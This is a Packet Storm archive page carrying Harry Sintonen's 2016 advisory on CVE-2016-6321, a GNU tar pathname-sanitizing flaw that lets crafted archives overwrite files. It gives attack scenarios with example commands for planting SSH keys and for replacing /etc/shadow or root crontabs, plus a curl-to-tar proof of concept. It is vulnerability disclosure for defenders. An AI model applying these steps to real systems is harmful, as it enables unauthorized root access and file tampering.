exploit the possibilities

GNU tar 1.29 Extract Pathname Bypass

GNU tar 1.29 Extract Pathname Bypass
Posted Oct 27, 2016
Authored by Harry Sintonen

The GNU tar archiver can be tricked into extracting files and directories in the given destination, regardless of the path name(s) specified on the command line. Versions 1.14 through 1.29 are affected.

tags | exploit, bypass
advisories | CVE-2016-6321
MD5 | d3225fb0115eb0e014c2558c2c124a7d

GNU tar 1.29 Extract Pathname Bypass

Change Mirror Download
---------------- t2'16 special vulnerability release -----------------

Vulnerability: POINTYFEATHER aka Tar extract pathname bypass
Credits: Harry Sintonen / FSC1V Cyber Security Services
Date: 2016-10-27
Impact: File overwrite in certain situations
Classifier: Full spectrum cyber
CVSS: 4.3.2
Threat level: Manatee


In a time when 0days are hoarded and exchanged for
local currencies in different parts of the world,
F-Secure CSS is going old-school and dropping a
not-so-valuable vulnerability, for free as in beer.

Tar will happily extract files & directories into
an arbitrary location when supplied with a suitably
crafted archive file. If a target system is extracting
an attacker supplied file, the vulnerability can
be exploited to gain file overwrite capability.

We have exploited this vulnerability in environments
where tar was run as root to gain root access on the
target. In most scenarios this is a non-issue, however
as we have witnessed, corner cases can be quite

After the communication with different parties was
discontinued for more than 42 days, the decision was
made to proceed with our honorable disclosure policy.

Greets to our Swedish friends olleb, Linus, Daniel W,
Ludde - see you at t2!

`;+####', .;####':` .;####':`
`#@@@@@@@@@@@, ;@@@@@@@@@@# ;@@@@@@@@@@#
+@@@@@@@@@@@@@, +@@@@@@@@@@@# +@@@@@@@@@@@#
#@@@@@#. .+@, @@@@@` ,## @@@@@` ,##
:@@@@@, ` @@@@@: @@@@@:
#@@@@# #@@@@@@@@'. #@@@@@@@@'.
@@@@@: #@@@@@@@@@@; #@@@@@@@@@@;
#@@@@+ ;#@@@@@@@@' ;#@@@@@@@@'
'@@@@@` `#@@@@@ `#@@@@@
@@@@@@; `'# #; `@@@@@ #; `@@@@@
`@@@@@@@@@@@@@@# #@@@@##@@@@@@+ #@@@@##@@@@@@+
;@@@@@@@@@@@@# #@@@@@@@@@@@+ #@@@@@@@@@@@+
.+@@@@@@@#: :#@@@@@@#: :#@@@@@@#:

Denmark · Finland · Poland · Sweden · Norway
Cyber Industrial Complex since '07


CVE-2016-6321 - GNU tar extract pathname bypass
The latest version of this advisory is available at:


GNU `tar' archiver can be tricked into extracting files and
directories in the given destination, regardless of the path
name(s) specified on the command line.


GNU `tar' archiver attempts to avoid path traversal attacks
by removing offending parts of the element name at extract.
This sanitizing leads to a vulnerability where the attacker
can bypass the path name(s) specified on the command line.


The attacker can create a crafted tar archive that, if
extracted by the victim, replaces files and directories
the victim has access to in the target directory, regardless
of the path name(s) specified on the command line.


The discovered vulnerability, described in more detail below,
enables file and directory overwrite attacks against the user
or system by using a crafted tar archive. The attack requires
that the victim or system extract the crafted tar archive prepared
by the attacker. Automated systems extracting paths from archives
originating from untrusted sources are in particular danger,
especially if the extract operation is performed with elevated

In the worst-case scenario this vulnerability can lead to a full
system compromise (remote code execution as root).

1. Extract pathname bypass due to safer_name_suffix usage

lib/paxnames.c safer_name_suffix() function sanitizes the `file_name'
parameter and removes the file system prefix from the name if
`absolute_names' parameter is 0. As a result, the path name
effectively becomes relative to the target directory, ignoring the
path name given on the command line.

The history of this bug is somewhat complicated:

- Before 13.12.1999 commit it was possible to extract entries
with member names containing ".." sequence(s).
- On 13.12.1999 commit the code was changed[1] to warn about
and skip member names that had ".." sequence(s):
`(extract_archive): By default, warn about ".." in member
names, and skip them.'
- However on 05.07.2003 the code was changed[2] to use
`safer_name_suffix' function:
`(extract_archive): Use safer_name_suffix rather than rolling
our own.'

The unfortunate side effect of the 05.07.2003 change was that
rather than skipping the entries with malicious member names with
".." in them, the code would now attempt to make the malicious name
safe. Making the name safe involves stripping all offending path
components, thus resulting the target name being relative to the
target directory root, regardless of the requested path name.

Here is a number of practical attack scenarios:

- Attack the user by replacing important files, such as
.ssh/authorized_keys, .bashrc, .bash_logout, .profile,
.subversion or .anyconnect, when they extract an tar archive.
For example:

user@host:~$ dpkg --fsys-tarfile evil.deb | tar -xf - \
--wildcards 'blurf*'
tar: Removing leading `blurf/../' from member names
user@host:~$ cat .ssh/authorized_keys
ssh-rsa AAAAB3...nU= mrrobot@fsociety

- Attack automation that extracts tar originating from a web
application or similar sources. Such operation might be performed by
a setuid root component of the application. The command executed
could be for example:

#tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc

The attacker can overwrite /var/spool/cron/crontabs/root to gain code
execution as root. It is also possible to replace binaries commonly
executed by root with a backdoored ones, or to drop setuid root
binaries that will enable the attacker to gain root privileges at
will. Common attack would be to replace some network facing daemon
with backdoored one, enabling covert code execution on demand.

This type of scenario has been successfully exploited in the real
world to gain a remote code execution as root in different

- Attack commands that try to replace single files/dirs as root:

The victim would like to replace `/etc/motd' file in the system by
extracting it from an archive obtained from an untrusted source:

# tar -C / -xvf archive.tar etc/motd
tar: Removing leading `etc/motd/../' from member names

The attacker can also bypass --exclude rule, if it is being used
with --anchored switch. For example: The victim would like to extract
all files but `/etc/shadow' from an archive:

# tar -C / -xvf archive.tar --anchored --exclude etc/shadow
tar: Removing leading `etc/motd/../' from member names

In both cases, the attacker has now successfully replaced /etc/shadow
file with arbitrary content.

Exploiting the vulnerability works best if the attacker has some prior
knowledge of the specifics of the tar command line that gets executed.
The path prefix before the `..' sequence will need to (at least
partially) match the target path (or not match in case of the exclude
rule) in order for the bypass attack to work. Guessing which paths
the victim might extract could work too, but the success rate is
likely lower.

Vulnerable versions

- GNU tar 1.14 to 1.29 (inclusive)

Affected operating systems

Red Hat
Alpine Linux
Red Star OS
any other Linux using GNU tar

Recommended changes to GNU tar

1. Skip entries with member names containing a '..', or fail the whole
tar extract operation. A proposed patch that mitigates the issue:


End user mitigation

1. If your OS distribution offers a fixed GNU tar version, install it


2. Only extract untrusted tar archives to a temporary directory in
virtual machine


3. Prohibit full spectrum cyber operations in your enterprise.


$ curl https://sintonen.fi/advisories/tar-poc.tar | tar xv etc/motd
$ cat etc/shadow


[1] http://git.savannah.gnu.org/cgit/tar.git/commit/src/
[2] http://git.savannah.gnu.org/cgit/tar.git/commit/src/


10.03.2016 discovered the vulnerability
11.03.2016 wrote a preliminary advisory
11.03.2016 contacted the GNU tar maintainer for a PGP key
14.03.2016 revised the advisory with --anchored --exclude bypass
15.03.2016 reworked the advisory slightly
15.03.2016 sent the advisory to the GNU tar maintainer
16.03.2016 contacted secalert@redhat.com for help in coordination
17.03.2016 added end user mitigation via --one-top-level to the
17.03.2016 GNU tar maintainer didn't consider this to be an issue.
as a result mitigation in upstream GNU tar appears
23.03.2016 added more attack scenarios to the advisory
10.08.2016 reworked the advisory slightly
10.08.2016 polled secalert@redhat.com regarding the status of the
11.08.2016 CVE-2016-6321 was assigned to the vulnerability
15.09.2016 polled secalert@redhat.com regarding the status of the
26.10.2016 handcrafted the ascii release file at a lobby bar
27.10.2016 public release of the advisory at t2'16
30.10.2016 fixed the patch to use FATAL_ERROR. ref:
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    7 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2020 Packet Storm. All rights reserved.

Security Services
Hosting By